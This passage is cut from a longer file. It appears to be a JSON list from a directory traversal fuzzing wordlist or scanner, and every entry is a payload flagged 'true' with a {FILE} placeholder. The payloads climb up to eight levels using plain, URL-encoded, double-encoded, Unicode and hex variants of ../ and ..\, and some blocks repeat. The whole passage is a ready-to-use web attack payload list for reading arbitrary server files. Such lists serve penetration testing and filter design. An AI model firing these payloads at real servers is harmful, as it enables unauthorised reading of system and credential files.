      "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
      "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
      "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
      "true,%2e%2e%2f{FILE}",
      "true,%2e%2e%2f%2e%2e%2f{FILE}",
      "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
      "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
      "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
      "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
      "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
      "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
      "true,..%252f{FILE}",
      "true,..%252f..%252f{FILE}",
      "true,..%252f..%252f..%252f{FILE}",
      "true,..%252f..%252f..%252f..%252f{FILE}",
      "true,..%252f..%252f..%252f..%252f..%252f{FILE}",
      "true,..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
      "true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
      "true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
      "true,%252e%252e/{FILE}",
      "true,%252e%252e/%252e%252e/{FILE}",
      "true,%252e%252e/%252e%252e/%252e%252e/{FILE}",
      "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
      "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
      "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
      "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
      "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
      "true,%252e%252e%252f{FILE}",
      "true,%252e%252e%252f%252e%252e%252f{FILE}",
      "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
      "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
      "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
      "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
      "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
      "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
      "true,..\\{FILE}",
      "true,..\\..\\{FILE}",
      "true,..\\..\\..\\{FILE}",
      "true,..\\..\\..\\..\\{FILE}",
      "true,..\\..\\..\\..\\..\\{FILE}",
      "true,..\\..\\..\\..\\..\\..\\{FILE}",
      "true,..\\..\\..\\..\\..\\..\\..\\{FILE}",
      "true,..\\..\\..\\..\\..\\..\\..\\..\\{FILE}",
      "true,..%5c{FILE}",
      "true,..%5c..%5c{FILE}",
      "true,..%5c..%5c..%5c{FILE}",
      "true,..%5c..%5c..%5c..%5c{FILE}",
      "true,..%5c..%5c..%5c..%5c..%5c{FILE}",
      "true,..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
      "true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
      "true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
      "true,%2e%2e\\{FILE}",
      "true,%2e%2e\\%2e%2e\\{FILE}",
      "true,%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
      "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
      "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
      "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
      "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
      "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
      "true,%2e%2e%5c{FILE}",
      "true,%2e%2e%5c%2e%2e%5c{FILE}",
      "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
      "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
      "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
      "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
      "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
      "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
      "true,..%255c{FILE}",
      "true,..%255c..%255c{FILE}",
      "true,..%255c..%255c..%255c{FILE}",
      "true,..%255c..%255c..%255c..%255c{FILE}",
      "true,..%255c..%255c..%255c..%255c..%255c{FILE}",
      "true,..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
      "true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
      "true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
      "true,%252e%252e\\{FILE}",
      "true,%252e%252e\\%252e%252e\\{FILE}",
      "true,%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
      "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
      "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
      "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
      "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
      "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
      "true,%252e%252e%255c{FILE}",
      "true,%252e%252e%255c%252e%252e%255c{FILE}",
      "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
      "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
      "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
      "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
      "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
      "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
      "true,../{FILE}",
      "true,../../{FILE}",
      "true,../../../{FILE}",
      "true,../../../../{FILE}",
      "true,../../../../../{FILE}",
      "true,../../../../../../{FILE}",
      "true,../../../../../../../{FILE}",
      "true,../../../../../../../../{FILE}",
      "true,..%2f{FILE}",
      "true,..%2f..%2f{FILE}",
      "true,..%2f..%2f..%2f{FILE}",
      "true,..%2f..%2f..%2f..%2f{FILE}",
      "true,..%2f..%2f..%2f..%2f..%2f{FILE}",
      "true,..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
      "true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
      "true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
      "true,%2e%2e/{FILE}",
      "true,%2e%2e/%2e%2e/{FILE}",
      "true,%2e%2e/%2e%2e/%2e%2e/{FILE}",
      "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
      "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
      "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
      "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
      "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
      "true,%2e%2e%2f{FILE}",
      "true,%2e%2e%2f%2e%2e%2f{FILE}",
      "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
      "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
      "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
      "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
      "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
      "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
      "true,..%252f{FILE}",
      "true,..%252f..%252f{FILE}",
      "true,..%252f..%252f..%252f{FILE}",
      "true,..%252f..%252f..%252f..%252f{FILE}",
      "true,..%252f..%252f..%252f..%252f..%252f{FILE}",
      "true,..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
      "true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
      "true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
      "true,%252e%252e/{FILE}",
      "true,%252e%252e/%252e%252e/{FILE}",
      "true,%252e%252e/%252e%252e/%252e%252e/{FILE}",
      "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
      "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
      "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
      "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
      "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
      "true,%252e%252e%252f{FILE}",
      "true,%252e%252e%252f%252e%252e%252f{FILE}",
      "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
      "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
      "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
      "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
      "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
      "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
      "true,..\\{FILE}",
      "true,..\\..\\{FILE}",
      "true,..\\..\\..\\{FILE}",
      "true,..\\..\\..\\..\\{FILE}",
      "true,..\\..\\..\\..\\..\\{FILE}",
      "true,..\\..\\..\\..\\..\\..\\{FILE}",
      "true,..\\..\\..\\..\\..\\..\\..\\{FILE}",
      "true,..\\..\\..\\..\\..\\..\\..\\..\\{FILE}",
      "true,..%5c{FILE}",
      "true,..%5c..%5c{FILE}",
      "true,..%5c..%5c..%5c{FILE}",
      "true,..%5c..%5c..%5c..%5c{FILE}",
      "true,..%5c..%5c..%5c..%5c..%5c{FILE}",
      "true,..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
      "true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
      "true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
      "true,%2e%2e\\{FILE}",
      "true,%2e%2e\\%2e%2e\\{FILE}",
      "true,%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
      "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
      "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
      "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
      "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
      "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
      "true,%2e%2e%5c{FILE}",
      "true,%2e%2e%5c%2e%2e%5c{FILE}",
      "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
      "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
      "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
      "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
      "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
      "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
      "true,..%255c{FILE}",
      "true,..%255c..%255c{FILE}",
      "true,..%255c..%255c..%255c{FILE}",
      "true,..%255c..%255c..%255c..%255c{FILE}",
      "true,..%255c..%255c..%255c..%255c..%255c{FILE}",
      "true,..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
      "true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
      "true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
      "true,%252e%252e\\{FILE}",
      "true,%252e%252e\\%252e%252e\\{FILE}",
      "true,%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
      "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
      "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
      "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
      "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
      "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
      "true,%252e%252e%255c{FILE}",
      "true,%252e%252e%255c%252e%252e%255c{FILE}",
      "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
      "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
      "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
      "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
      "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
      "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
      "true,\\../{FILE}",
      "true,\\../\\../{FILE}",
      "true,\\../\\../\\../{FILE}",
      "true,\\../\\../\\../\\../{FILE}",
      "true,\\../\\../\\../\\../\\../{FILE}",
      "true,\\../\\../\\../\\../\\../\\../{FILE}",
      "true,\\../\\../\\../\\../\\../\\../\\../{FILE}",
      "true,\\../\\../\\../\\../\\../\\../\\../\\../{FILE}",
      "true,/..\\{FILE}",
      "true,/..\\/..\\{FILE}",
      "true,/..\\/..\\/..\\{FILE}",
      "true,/..\\/..\\/..\\/..\\{FILE}",
      "true,/..\\/..\\/..\\/..\\/..\\{FILE}",
      "true,/..\\/..\\/..\\/..\\/..\\/..\\{FILE}",
      "true,/..\\/..\\/..\\/..\\/..\\/..\\/..\\{FILE}",
      "true,/..\\/..\\/..\\/..\\/..\\/..\\/..\\/..\\{FILE}",
      "true,.../{FILE}",
      "true,.../.../{FILE}",
      "true,.../.../.../{FILE}",
      "true,.../.../.../.../{FILE}",
      "true,.../.../.../.../.../{FILE}",
      "true,.../.../.../.../.../.../{FILE}",
      "true,.../.../.../.../.../.../.../{FILE}",
      "true,.../.../.../.../.../.../.../.../{FILE}",
      "true,...\\{FILE}",
      "true,...\\...\\{FILE}",
      "true,...\\...\\...\\{FILE}",
      "true,...\\...\\...\\...\\{FILE}",
      "true,...\\...\\...\\...\\...\\{FILE}",
      "true,...\\...\\...\\...\\...\\...\\{FILE}",
      "true,...\\...\\...\\...\\...\\...\\...\\{FILE}",
      "true,...\\...\\...\\...\\...\\...\\...\\...\\{FILE}",
      "true,..../{FILE}",
      "true,..../..../{FILE}",
      "true,..../..../..../{FILE}",
      "true,..../..../..../..../{FILE}",
      "true,..../..../..../..../..../{FILE}",
      "true,..../..../..../..../..../..../{FILE}",
      "true,..../..../..../..../..../..../..../{FILE}",
      "true,..../..../..../..../..../..../..../..../{FILE}",
      "true,....\\{FILE}",
      "true,....\\....\\{FILE}",
      "true,....\\....\\....\\{FILE}",
      "true,....\\....\\....\\....\\{FILE}",
      "true,....\\....\\....\\....\\....\\{FILE}",
      "true,....\\....\\....\\....\\....\\....\\{FILE}",
      "true,....\\....\\....\\....\\....\\....\\....\\{FILE}",
      "true,....\\....\\....\\....\\....\\....\\....\\....\\{FILE}",
      "true,........................................................................../{FILE}",
      "true,........................................................................../../{FILE}",
      "true,........................................................................../../../{FILE}",
      "true,........................................................................../../../../{FILE}",
      "true,........................................................................../../../../../{FILE}",
      "true,........................................................................../../../../../../{FILE}",
      "true,........................................................................../../../../../../../{FILE}",
      "true,........................................................................../../../../../../../../{FILE}",
      "true,..........................................................................\\{FILE}",
      "true,..........................................................................\\..\\{FILE}",
      "true,..........................................................................\\..\\..\\{FILE}",
      "true,..........................................................................\\..\\..\\..\\{FILE}",
      "true,..........................................................................\\..\\..\\..\\..\\{FILE}",
      "true,..........................................................................\\..\\..\\..\\..\\..\\{FILE}",
      "true,..........................................................................\\..\\..\\..\\..\\..\\..\\{FILE}",
      "true,..........................................................................\\..\\..\\..\\..\\..\\..\\..\\{FILE}",
      "true,..%u2215{FILE}",
      "true,..%u2215..%u2215{FILE}",
      "true,..%u2215..%u2215..%u2215{FILE}",
      "true,..%u2215..%u2215..%u2215..%u2215{FILE}",
      "true,..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}",
      "true,..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}",
      "true,..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}",
      "true,..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}",
      "true,%uff0e%uff0e/{FILE}",
      "true,%uff0e%uff0e/%uff0e%uff0e/{FILE}",
      "true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}",
      "true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}",
      "true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}",
      "true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}",
      "true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}",
      "true,%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}",
      "true,%uff0e%uff0e%u2215{FILE}",
      "true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}",
      "true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}",
      "true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}",
      "true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}",
      "true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}",
      "true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}",
      "true,%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}",
      "true,..%u2216{FILE}",
      "true,..%u2216..%u2216{FILE}",
      "true,..%u2216..%u2216..%u2216{FILE}",
      "true,..%u2216..%u2216..%u2216..%u2216{FILE}",
      "true,..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}",
      "true,..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}",
      "true,..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}",
      "true,..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}",
      "true,..%uEFC8{FILE}",
      "true,..%uEFC8..%uEFC8{FILE}",
      "true,..%uEFC8..%uEFC8..%uEFC8{FILE}",
      "true,..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}",
      "true,..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}",
      "true,..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}",
      "true,..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}",
      "true,..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}",
      "true,..%uF025{FILE}",
      "true,..%uF025..%uF025{FILE}",
      "true,..%uF025..%uF025..%uF025{FILE}",
      "true,..%uF025..%uF025..%uF025..%uF025{FILE}",
      "true,..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}",
      "true,..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}",
      "true,..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}",
      "true,..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}",
      "true,%uff0e%uff0e\\{FILE}",
      "true,%uff0e%uff0e\\%uff0e%uff0e\\{FILE}",
      "true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}",
      "true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}",
      "true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}",
      "true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}",
      "true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}",
      "true,%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}",
      "true,%uff0e%uff0e%u2216{FILE}",
      "true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}",
      "true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}",
      "true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}",
      "true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}",
      "true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}",
      "true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}",
      "true,%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}",
      "true,..0x2f{FILE}",
      "true,..0x2f..0x2f{FILE}",
      "true,..0x2f..0x2f..0x2f{FILE}",
      "true,..0x2f..0x2f..0x2f..0x2f{FILE}",
      "true,..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}",
      "true,..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}",
      "true,..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}",
      "true,..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}",
      "true,0x2e0x2e/{FILE}",
      "true,0x2e0x2e/0x2e0x2e/{FILE}",
      "true,0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}",
      "true,0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}",
      "true,0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}",
      "true,0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}",
      "true,0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}",
      "true,0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}",
      "true,0x2e0x2e0x2f{FILE}",
      "true,0x2e0x2e0x2f0x2e0x2e0x2f{FILE}",
      "true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}",
      "true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}",
      "true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}",
      "true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}",
      "true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}",
      "true,0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}",
      "true,..0x5c{FILE}",
      "true,..0x5c..0x5c{FILE}",
      "true,..0x5c..0x5c..0x5c{FILE}",
      "true,..0x5c..0x5c..0x5c..0x5c{FILE}",
      "true,..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}",
      "true,..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}",
      "true,..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}",
      "true,..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}",
      "true,0x2e0x2e\\{FILE}",
      "true,0x2e0x2e\\0x2e0x2e\\{FILE}",
      "true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}",
      "true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}",
      "true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}",
      "true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}",
      "true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}",
      "true,0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}",
      "true,0x2e0x2e0x5c{FILE}",
      "true,0x2e0x2e0x5c0x2e0x2e0x5c{FILE}",
